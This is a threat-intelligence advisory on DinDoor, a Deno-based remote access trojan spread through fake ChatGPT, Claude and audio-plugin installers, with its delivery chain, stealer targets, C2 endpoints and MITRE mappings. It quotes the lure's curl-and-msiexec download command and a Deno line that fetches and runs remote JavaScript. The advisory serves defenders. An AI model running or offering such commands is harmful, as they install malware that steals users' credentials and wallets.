# DinDoor Deno-Based RAT — Fake AI/Audio Software on GitHub & SourceForge (ChatGPT/Claude/AutoTune/Kontakt) via Compromised YouTube Channels

> DinDoor is a Deno JavaScript runtime-based RAT (Tsundere Botnet variant) distributed through fake installers and plugins impersonating ChatGPT, Claude, AutoTune, Kontakt, ZENOLOGY, Ableton Live, GearUP, and BWR on GitHub and SourceForge, with traffic driven by compromised YouTube channels (50,000+ views). Victims are coached to paste terminal commands that fetch MSI/PowerShell payloads, which abuse Scoop and WinGet to install Deno and execute the RAT — capable of browser and 50+ wallet exfiltration, screen capture, VNC, and a novel peer-to-peer C2 channel that uses hidden Microsoft Edge processes plus WebRTC to stream H.264-encoded screen frames directly to operators. Broadcom and Hunt.io attribute DinDoor to Iran's MuddyWater (Seedworm) APT.

- **Published:** 2026-05-26T00:00:00Z
- **Last reviewed:** 2026-05-26T00:00:00Z
- **Canonical:** https://intel.threadlinqs.com/threat/TL-2026-0590
- **ID:** TL-2026-0590
- **Severity:** HIGH
- **Category:** MALWARE
- **Status:** ACTIVE
- **Actor:** DinDoor Operators (Iran)
- **Detections:** 9 · **IOCs:** 62 (full data via the Threadlinqs MCP server — Purple tier)

## Description

DinDoor is a Deno JavaScript runtime-based remote access trojan first publicly named in March 2026 and tracked as a variant of the Tsundere Botnet (a Node.js-era JavaScript RAT). Broadcom and Hunt.io attribute the malware family to Iran's MuddyWater (Seedworm) APT, while the consumer-facing campaign documented by Malwarebytes ThreatDown on 2026-05-26 may represent a separate operator cluster reusing the same DinDoor toolkit to monetize endpoint access via cryptocurrency and credential theft.

The Malwarebytes-documented campaign delivers DinDoor through fake installers and plugins hosted on GitHub (claude-free-plugin, ai-gen-profi, wharfdemolisherpit) and SourceForge (gearup, bluewaveremover) impersonating ChatGPT, Claude, AutoTune, Kontakt, ZENOLOGY, Ableton Live, GearUP, and BWR. Traffic is funneled from compromised YouTube channels with tutorial videos accumulating over 50,000 views before takedown. Repositories present both Windows and macOS terminal commands that users are instructed to copy and execute — a 'click-to-run-command' / terminal-paste social engineering pattern. A representative Windows command is: 'curl -Lo %temp%\s.msi https://raw.githubusercontent.com/claude-free-plugin/install/main/install.msi && msiexec /i %temp%\s.msi'.

Stage 1 (package manager abuse): The MSI launches a PowerShell loader (observed names include Juliet_widget15.ps1 and tango_utility84.ps1) dropped to AppData\Local\documents\ and executed via cmd.exe with hidden window, no-profile, and bypass-execution-policy flags. The script ensures both Scoop (alternative Windows package manager) and WinGet (Microsoft Package Manager) are present and installs Deno via 'winget.exe install --id DenoLand.Deno -e --accept-source-agreements --silent'. Deno is downloaded from the legitimate dl.deno.land endpoint to %USERPROFILE%\.deno\bin\deno.exe with no administrative privileges required — a living-off-the-land pattern that bypasses signature-based detection because every binary on disk is signed and legitimate.

Stage 2 (Deno launcher & DinDoor RAT): Deno is invoked as 'deno.exe run -A http://{C2}/{random_path}.js' — the -A flag grants all runtime permissions. An eval-loop construct ('deno run -A --no-check –') fetches subsequent JavaScript stages without disk writes, often using 'data:application/javascript;base64' URIs to keep payloads memory-resident. The launcher binds a TCP listener on a fixed localhost port (10044 or 10091, sample-dependent) and exits if the port is already in use — acting as a single-instance mutex. It then fingerprints the host via a dual rolling hash (constant 0x9E3779B9) over USERNAME, hostname, total RAM, and OS release string, producing a 16-character hexadecimal victim ID attached to every C2 request.

Capabilities and stealer module: DinDoor exposes operator commands 'exec' (shell), 'exec-ps' (PowerShell), 'exec-sc' (service control), 'sysinfo', 'screenshot', and 'stealer'. The stealer targets 50+ cryptocurrency wallet browser extensions (Atomic Wallet, Exodus, Electrum, ByteCoin), Chromium-family and other browsers (Chrome, Chromium, Brave, Edge, Opera, Vivaldi, CentBrowser), messaging clients (Telegram, Discord, Lightcord), clipboard contents (with hijack/modification capability), and selected files via file system enumeration.

Novel P2P C2 via Microsoft Edge: DinDoor's most distinctive capability is a peer-to-peer streaming mode that spawns hidden Microsoft Edge browser processes through the Chrome DevTools Protocol (CDP), injects WebRTC HTML pages into those Edge contexts, captures H.264-encoded screen frames, and streams encrypted peer-to-peer video and control directly to operators via WebSocket-based signaling — bypassing the C2 server for live interactive sessions and severely complicating network-based detection. A custom VNC implementation over WebSocket provides full bidirectional remote desktop control for non-streaming scenarios.

Persistence and C2 infrastructure: Persistence is established via the PowerShell HKCU Run registry key. Beaconing uses HTTP (commonly port 80) and WebSocket against endpoints including /security-pool, /v2{ID}.js, /health, /event, and /mv2/<JWT>/<victim_hash>. Beacon intervals range from 1-second polling (observed) to 30-second intervals (migcredit sample). Infrastructure includes Cloudflare Workers (cf-proxy.cloud-analytics-services.workers.dev) and Caddy reverse proxy chains, identifiable via a distinctive HTTP 'Via: 1.1 Caddy, 1.1 Caddy' response header suggesting at least two proxy hops between internet-facing host and backend application. Hunt.io enumerated 20 active C2 servers concurrently online.

Attribution evidence: The 'Amy Cherne' code-signing certificate found in Installer_v1.21.66.msi has been referenced in research tied to MuddyWater and Russian cybercrime actors operating CastleRAT. Decoded JWT campaign metadata matches MuddyWater operations per JUMPSEC research. CastleLoader (separate loader) shares behavioral overlap and infrastructure with DinDoor (notably the serialmenot.com C2). ChainShell, a Node.js agent observed in the same cluster, shares no code with DinDoor but appears in overlapping infections. Two analyzed samples (migcredit.pdf.msi and Installer_v1.21.66.msi) were built with WiX Toolset on 2026-03-26 and 2026-02-13 respectively, with author metadata 'yankee20' and 'alpha_tool27'.

Why this matters: Deno (and Bun, in the related NWHStealer family) are not commonly profiled by enterprise EDRs, which still focus on Node.js. The runtime is signed, legitimate, and installed via signed package managers, so the malicious payload exists primarily as transient JavaScript fetched into memory — there is no malicious PE on disk after Stage 1 completes. Combined with WebRTC P2P operator channels, this campaign represents a meaningful evasion uplift over conventional RAT delivery and should be treated as a high-priority hunt target by SOCs serving creative, AI-adjacent, and gaming user populations.

## MITRE ATT&CK

- T1583.001 Acquire Infrastructure: Domains
- T1586.001 Compromise Accounts: Social Media Accounts
- T1587.001 Develop Capabilities: Malware
- T1588.003 Obtain Capabilities: Code Signing Certificates
- T1189 Drive-by Compromise
- T1566.002 Phishing: Spearphishing Link
- T1204.002 User Execution: Malicious File
- T1059.001 Command and Scripting Interpreter: PowerShell
- T1059.003 Command and Scripting Interpreter: Windows Command Shell
- T1059.004 Command and Scripting Interpreter: Unix Shell
- T1059.007 Command and Scripting Interpreter: JavaScript
- T1218.007 System Binary Proxy Execution: Msiexec
- T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
- T1564.003 Hide Artifacts: Hidden Window
- T1027 Obfuscated Files or Information
- T1027.013 Obfuscated Files or Information: Encrypted/Encoded File
- T1620 Reflective Code Loading
- T1553.002 Subvert Trust Controls: Code Signing
- T1036.005 Match Legitimate Resource Name or Location
- T1140 Deobfuscate/Decode Files or Information
- T1497.001 Virtualization/Sandbox Evasion: System Checks
- T1082 System Information Discovery
- T1033 System Owner/User Discovery
- T1083 File and Directory Discovery
- T1518 Software Discovery
- T1555.003 Credentials from Password Stores: Credentials from Web Browsers
- T1555 Credentials from Password Stores
- T1113 Screen Capture
- T1115 Clipboard Data
- T1005 Data from Local System
- T1071.001 Application Layer Protocol: Web Protocols
- T1071.005 Publish/Subscribe Protocols
- T1090 Proxy
- T1105 Ingress Tool Transfer
- T1102.002 Web Service: Bidirectional Communication
- T1095 Non-Application Layer Protocol
- T1572 Protocol Tunneling
- T1041 Exfiltration Over C2 Channel
- T1567 Exfiltration Over Web Service

## Sources

- [Fake software on GitHub and SourceForge distribute Deno RAT](https://www.malwarebytes.com/blog/threat-intel/2026/05/fake-software-on-github-and-sourceforge-distribute-deno-rat)
- [DinDoor Backdoor: Deno Runtime Abuse and 20 Active C2 Servers](https://hunt.io/blog/dindoor-deno-runtime-backdoor-msi-analysis)
- [DinDoor Backdoor Exploits Deno and MSI Installers to Slip Past Detection](https://gbhackers.com/deno-and-msi-installers-exploited/)
- [New DinDoor Backdoor Abuses Deno Runtime and MSI Installers to Evade Detection](https://cybersecuritynews.com/new-dindoor-backdoor-abuses-deno-runtime/)
- [Iranian APT MuddyWater Uses Dindoor Malware to Target U.S. Networks](https://socradar.io/blog/iran-muddywater-dindoor-malware-us-networks/)
- [MuddyWater's Dindoor Backdoor: Iranian APT Targets U.S. Organizations via Deno Runtime and Cloud Storage](https://www.rescana.com/post/muddywater-s-dindoor-backdoor-iranian-apt-targets-u-s-organizations-via-deno-runtime-and-cloud-sto)
- [CastleRAT attack first to abuse Deno JavaScript runtime to evade enterprise security](https://www.threatdown.com/blog/castlerat-cyber-attack-is-the-first-to-abuse-deno-javascript-runtime-to-evade-enterprise-security/)
- [Analyzing DinDoor, the Deno-Powered Backdoor Disguised as Legitimate Tooling](https://www.planetjon.net/news/cybersecurity/analyzing-dindoor-the-deno-powered-backdoor-disguised-as-legitimate-tooling/)

## Full data

Detection queries (Splunk SPL / Microsoft KQL / Sigma) and IOC values require the Threadlinqs MCP server (Purple tier): https://intel.threadlinqs.com/mcp

Canonical: https://intel.threadlinqs.com/threat/TL-2026-0590
